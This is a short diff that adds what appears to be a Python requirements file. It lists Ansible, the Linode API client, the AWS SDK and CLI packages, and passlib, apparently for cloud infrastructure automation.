View File
@@ -0,0 +1,6 @@
ansible
linode_api4
boto3
botocore
awscli
passlib